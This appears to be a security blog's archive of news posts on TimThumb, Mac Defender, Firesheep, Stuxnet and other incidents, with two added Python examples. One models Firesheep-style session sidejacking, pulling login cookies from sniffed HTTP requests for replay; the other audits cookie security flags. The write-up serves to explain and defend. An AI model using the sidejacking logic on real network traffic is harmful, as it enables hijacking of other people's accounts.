Archive for the ‘Security’ Category

TimThumb vulnerability

A vulnerability that allows remote attackers to take over your Web site has been found in the extremely popular TimThumb image-resizing script.

The flaw lets an unauthenticated third party get a file containing arbitrary PHP code written into TimThumb’s cache directory, which the Web server serves directly, and then run it simply by requesting it. Once attacker-controlled PHP runs on the server, your site can be compromised however the attacker likes.

We recommend deleting timthumb.php or thumb.php if your site will work without them. If the file exists in a theme or plugin that you’re no longer using, you may want to remove the entire theme or plugin directory. After you remove the TimThumb library, make sure you check that your site is still working correctly. Note that deleting the script does not undo an exploitation that has already happened: also look in the script’s cache directory (and elsewhere under wp-content) for files that contain PHP code rather than image data, and treat any you find as a compromise.

This is potentially a massive threat because millions of Web sites use the TimThumb script, and every one of them needs to be updated or have the script removed. Help spread the word.

For complete technical details, visit the post detailing the discovery on Mark Maunder’s site.


Mac malware moves into mainstream

Wired points to a couple of recent stories by ZDNet writer Ed Bott marking the first widespread trojan infections in the Mac community.

The trojan horse is called Mac Defender. It arrives through a Web pop-up carrying a spoofed warning that the visitor’s machine is infected by a virus and that anti-virus software must be installed; no exploit is involved, the user has to agree to install it. Once installed, the program sporadically loads porn websites on the computer.

ZDNet writer Ed Bott was first to spot a long thread of complaints in Apple’s support forums related to Mac Defender, with at least 200 posts of customers reporting they’ve been infected by the malware.

“I’ve done similar searches in the past … [and] I have never found more than one or two in-the-wild reports,” Bott wrote. “This time, the volume is truly exceptional.”

This seems likely to be the first of many instances. As Apple continues to increase market share, malware writers are increasingly likely to focus their efforts on the growing Mac market.


WP 3.0.2

If you haven’t already, update your WordPress installation. It’s really easy. And 3.0.2 provides a “mandatory” security update.

The haiku:

Fixed on day zero
One-click update makes you safe
This used to be hard

One click updates! Reason No. 43,954 that WordPress is better than Joomla or Drupal. Jus’ sayin’.


Hotmail security still sucks

Robert Graham of Errata Security takes a look at the recent “Web 2.0” report card compiled by Digital Society, and remarks:

Of the major webmail providers in the U.S., only Gmail is secure against sidejacking attacks. Yahoo Mail and HotMail are insecure, and can be compromised quickly. There are still a lot of HotMail users out there — they are fools.

I talked to the people at Microsoft responsible for fixing this problem ALMOST THREE YEARS AGO. Yet, they’ve done nothing about fixing this huge hole. I just tried it out today — while FireSheep looks a bit funky (it doesn’t correctly show the user name), it easily hacks into HotMail accounts.

Among the best on the card? WordPress!


Eric Butler’s new ‘hack Facebook’ plugin for Firefox

Oh the mischief this new Firefox plugin is going to cause.

Firesheep adds a sidebar to Mozilla’s Firefox browser that shows when anyone on an open network — such as a coffee shop’s Wi-Fi network — visits an insecure site. “Double-click on someone [in the sidebar] and you’re instantly logged on as them,” said [plugin author Eric] Butler in his short description of his add-on.

Computerworld says the Firesheep add-on has been downloaded more than 50,000 times since it was released Sunday. You can download Firesheep from Butler’s Web site. It’s extremely easy to install: just download the .xpi file, drag it to a Firefox window, and restart.

And it’s not just Facebook that Butler’s plugin makes double-click hackable, either. Others include:

  • Amazon.com
  • Basecamp
  • bit.ly
  • CNET
  • Dropbox
  • Facebook
  • Flickr
  • Foursquare
  • Google
  • Gowalla
  • Windows Live
  • Tumblr
  • Twitter
  • WordPress
  • Yahoo
  • Yelp
  • and others

The plugin is relatively easy to customize, too: someone with not much more than basic programming skills could add other domains to Firesheep’s default list. TechCrunch offers a pretty thorough explanation of how Firesheep works and the plugin’s impact, as well as a possible defense. The truth is, though, that the weakness is not the Wi-Fi itself but sites that set a login cookie and then accept it over plain HTTP, where anyone on an open network can read it. Until a site serves every logged-in page over HTTPS and marks its session cookie Secure, the only protection for users on public Wi-Fi is to tunnel everything through a VPN or not log in at all. But that isn’t news, is it?
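What Firesheep actually does, as an added example that is not part of the original post and not Firesheep’s own code: read plaintext HTTP requests off the wire, match the Host header against a table of sites and their session-cookie names, and hand back the Cookie header that logs you in as the victim. The capture below is constructed, the site table is an illustrative stand-in for Firesheep’s real handler list, and the TLS packet is there to show why HTTPS-only sites are invisible to it.

```python
"""Firesheep-style session sidejacking, modelled offline.

Added example, not Firesheep's own code.  Firesheep sniffs an open Wi-Fi
network for plaintext HTTP requests, pulls the session cookies out of them and
replays them from the attacker's browser.  Here the "capture" is a constructed
list of request payloads, and the site table (which cookie names make up a
login) is an assumed, illustrative one rather than Firesheep's real handlers.
"""
from dataclasses import dataclass


@dataclass
class SiteHandler:
    name: str
    domain: str               # Host must be this domain or a subdomain of it
    session_cookies: tuple    # cookie names that together carry the login
    user_cookie: str          # cookie whose value labels the victim in the sidebar


# Assumed handler table for the demo (Firesheep shipped one JS file per site).
HANDLERS = [
    SiteHandler("Example Social", "social.example", ("sid", "xs"), "c_user"),
    SiteHandler("Example Mail", "mail.example", ("auth",), "login"),
]


def parse_request(raw: str):
    """Split a plaintext HTTP/1.x request into (method, path, headers, cookies)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            cookies[key] = value
    return method, path, headers, cookies


def match_handler(host: str):
    """Pick the handler for a Host header, ignoring any :port suffix."""
    host = host.split(":")[0].lower()
    for handler in HANDLERS:
        if host == handler.domain or host.endswith("." + handler.domain):
            return handler
    return None


@dataclass
class Capture:
    site: str
    host: str
    user: str
    replay_cookie: str   # Cookie: header value that logs the attacker in as the victim


def sidejack(packets):
    """Return one Capture per request that carried a complete login session.

    `packets` is a list of (dst_port, payload) pairs as a sniffer would hand
    over.  TLS traffic (port 443) is opaque to a passive sniffer, so it is
    skipped: that is exactly why all-HTTPS sites are not on Firesheep's list.
    """
    found = []
    for port, payload in packets:
        if port != 80:
            continue
        _, _, headers, cookies = parse_request(payload)
        handler = match_handler(headers.get("host", ""))
        if handler is None:
            continue
        if not all(name in cookies for name in handler.session_cookies):
            continue   # anonymous visitor or partial session: nothing to hijack
        replay = "; ".join(f"{n}={cookies[n]}" for n in handler.session_cookies)
        found.append(Capture(handler.name, headers["host"],
                             cookies.get(handler.user_cookie, "?"), replay))
    return found


# Constructed capture: what a sniffer on the coffee-shop network would see.
CAPTURE = [
    (80, "GET /home.php HTTP/1.1\r\nHost: www.social.example\r\n"
         "Cookie: c_user=100042; sid=9f3a7c; xs=0e1b2d; locale=en\r\n\r\n"),
    (80, "GET / HTTP/1.1\r\nHost: www.social.example\r\nCookie: locale=en\r\n\r\n"),
    (443, "\x16\x03\x01\x00\xa5..."),   # TLS ClientHello: nothing readable
    (80, "GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
         "Cookie: login=bob; auth=Zm9v\r\n\r\n"),
]

if __name__ == "__main__":
    for cap in sidejack(CAPTURE):
        print(f"{cap.site}: {cap.user}@{cap.host}  ->  Cookie: {cap.replay_cookie}")
```

Adding a site to the table is a one-line change, which is the point the post makes about how easy Firesheep is to extend; the replay value is all a browser needs because the server cannot tell the attacker’s copy of the cookie from the victim’s.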


Pirates of anonymity

The perils of assuming you are anonymous.

ACS:Law, a law firm based in Great Britain that tracks down alleged illegal file sharers for the porn industry, saw its database compromised over the weekend by members of the Internet forum 4chan. In addition to private e-mails and financial data belonging to the law firm, the names of people whom ACS:Law has accused of downloading unauthorized copies of porn movies were also revealed.

That sounds bad enough. But it gets worse.

The blog Torrentfreak reported that among the information posted to the Web were e-mails from people pleading for mercy and “married men who have been confronted with allegations of sharing gay porn.”

Unfortunate, no doubt. Here in Cambodia, such high-tech attempts at tracking down online pirates seem remote. Untoward political speech and affronts to culture still remain the Kingdom’s most offensive topics. A few crude attempts appear to have been made at limiting information in this vein. Though like many law enforcement efforts, that crackdown too proved short-lived and of questionable success. Real-world piracy — that is, the millions of bootleg $2 music and software disks available in every local market — is still a much bigger problem, and costs the country far, far more money.


Weaponized software

Iran is fighting off a significant cyber attack, reports The New York Times. The worm, dubbed Stuxnet, represents a hellish breakthrough in the evolution of malware: it is built to sabotage physical industrial processes rather than to steal data.

Stuxnet, which was first publicly identified several months ago, is aimed solely at industrial equipment made by Siemens that controls oil pipelines, electric utilities, nuclear facilities and other large industrial sites. While it is not clear that Iran was the main target — the infection has also been reported in Indonesia, Pakistan, India and elsewhere — a disproportionate number of computers inside Iran appear to have been struck, according to reports by computer security monitors.

The Christian Science Monitor was among the first mainstream outlets to report on Stuxnet. The primary source of the CSM story was computer security expert Ralph Langner, who has been chronicling his research of the worm on his Web site. Langner called Stuxnet the “hack of the century,” and said “Stuxnet is going to be the best studied piece of malware in history.”

Wired magazine, unsurprisingly, has the definitive story.

“It’s the most complex piece of malware we’ve seen in the last five years or more,” says Nicolas Falliere, a code analyst at security firm Symantec. “It’s the first known time that malware is not targeting credit card [data], is not trying to steal personal user data, but is attacking real-world processing systems. That’s why it’s unique and is not over-hyped.”

… Eric Byres, chief technology officer for Byres Security, says the malware isn’t content to just inject a few commands into the PLC [Programmable Logic Controller] but does “massive reworking” of it.

“They’re massively trying to do something different than the processor was designed to do,” says Byres, who has extensive experience maintaining and troubleshooting Siemens control systems. “Every function block takes a fair amount of work to write, and they’re trying to do something quite radically different. And they’re not doing it in a light way. Whoever wrote this was really trying to mess with that PLC. We’re talking man-months, if not years, of coding to make it work the way it did.”


VBMania: New worm ‘spreading like wildfire’

McAfee and others are reporting a new and fast-spreading worm, currently dubbed the “Here you have” virus, which spreads via emails with the subject line “Here you have” or “Just for you”.

The body of the email contains a link to a Web site that hosts the malware. Because the message itself carries only a link and no attachment, anti-virus scanning at the mail gateway has nothing to inspect; the malicious file only reaches the user’s computer once the link is clicked, which is how it slips past the first line of protection.

Once the virus infects a computer, it then sends itself to all the addresses in the computer user’s address book. The new emails appear as if they were sent by the infected user, which of course they were. Unsuspecting users are apparently clicking on the links by the hundreds of thousands.

Symantec says the new worm also:

  • Spreads through mapped drives via autorun
  • Spreads through email, taking contacts from the address book
  • Spreads through instant messenger
  • Disables various security-related programs

McAfee provides forensics and disinfection tools.


How safe is Facebook?

Users in the United States were given access to the Facebook accounts of other people, reports the Associated Press.

“A Georgia mother and her two daughters logged onto Facebook from mobile phones last weekend and wound up in a startling place: strangers’ accounts with full access to troves of private information,” the story says.

The AP does not explain how the mix-up happened, but the problem was apparently not with Facebook itself. The glitch, “a routing problem,” occurred between the users’ phones and their Internet service provider, AT&T.

Security experts interviewed for the story said they had never heard of a case like this, where users were given access to the wrong account. It’s unknown whether such a mix-up is rare, or just rarely reported. Experts agreed that the same flaw could happen with other applications, such as email or blogging services.

READ IT: Network Flaw Causes Scary Web Error

MORE: Ars Technica provides a not-too-technical explanation of what likely happened, including this pithy synopsis:

“So it looks like AT&T did something wrong—even though I wouldn’t call it a “routing” problem—and the company is in the process of fixing things. But Facebook also shares some blame for this situation. Apparently Facebook, like many other sites, doesn’t think the information tied to a user’s account is important enough to protect with something stronger than a clear text cookie.”
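The server-side check behind the Hotmail and Firesheep sidejacking posts above as well as Ars’s “clear text cookie” point here, as an added example that is not from the Digital Society report card, Ars, or any provider: parse a response’s Set-Cookie headers and report any login cookie that a browser would send over plain HTTP. The two responses are constructed, and the session cookie name sid is assumed.

```python
"""Audit a site's Set-Cookie headers for sidejacking exposure.

Added example; not from the Digital Society report card or from any provider.
A session cookie without the Secure attribute is attached to every plain-HTTP
request to the site, which is exactly what an open-network sniffer reads and
what lands in the wrong hands when a carrier or proxy mixes sessions up.  The
sample responses below are constructed, not real provider headers, and the
session cookie name is assumed.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass
class Cookie:
    name: str
    value: str
    secure: bool
    httponly: bool
    domain: Optional[str]


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value (RFC 6265 section 5.2 shape)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return Cookie(name.strip(), value, "secure" in attrs, "httponly" in attrs,
                  attrs.get("domain"))


def sent_over_plaintext(cookie: Cookie) -> bool:
    """Browser rule (RFC 6265 section 5.4): a cookie marked Secure is only
    attached to requests over a secure channel; anything else goes out with
    http:// requests too."""
    return not cookie.secure


def audit(response_headers, session_names):
    """Return a list of findings for one HTTP response.

    response_headers: list of (name, value) pairs as the server sent them.
    session_names: the cookie names that identify a login on this site.
    """
    findings = []
    hsts = any(k.lower() == "strict-transport-security" for k, _ in response_headers)
    for key, raw in response_headers:
        if key.lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(raw)
        if cookie.name not in session_names:
            continue
        if sent_over_plaintext(cookie):
            findings.append(f"{cookie.name}: no Secure flag, sent over plain HTTP (sidejackable)")
        if not cookie.httponly:
            findings.append(f"{cookie.name}: no HttpOnly flag, readable by injected script")
    if not hsts:
        findings.append("no Strict-Transport-Security: an http:// link still produces "
                        "a plaintext request that carries any non-Secure cookie")
    return findings


# Constructed responses: the weak configuration beside the corrected one.
WEAK = [
    ("Set-Cookie", "sid=9f3a7c; Path=/; Domain=.social.example"),
    ("Set-Cookie", "locale=en; Path=/"),
]
HARDENED = [
    ("Set-Cookie", "sid=9f3a7c; Path=/; Domain=.social.example; Secure; HttpOnly"),
    ("Set-Cookie", "locale=en; Path=/"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
]
SESSION_COOKIES = {"sid"}   # assumed name of the login cookie

if __name__ == "__main__":
    for label, headers in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, "->", audit(headers, SESSION_COOKIES) or ["OK"])
```

Only the login cookie matters here: a preference cookie such as locale leaking tells an attacker nothing, which is why the audit takes the set of session cookie names as input rather than flagging every cookie.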

